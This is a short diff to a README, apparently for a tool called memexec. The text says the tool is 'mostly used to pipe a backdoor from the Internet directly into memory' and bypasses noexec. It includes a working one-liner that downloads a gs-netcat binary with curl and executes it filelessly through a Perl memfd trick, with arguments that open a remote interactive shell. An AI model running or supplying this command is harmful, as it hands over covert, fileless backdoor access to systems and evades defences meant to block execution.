hackerschoice/memexec/README.md

 ---

-The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohobited by `noexec`:
+The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohobited by `noexec` or there is no writeable directory:
 ```shell
 curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | GS_ARGS="-ilD -s ChangeMe" perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@"
 ```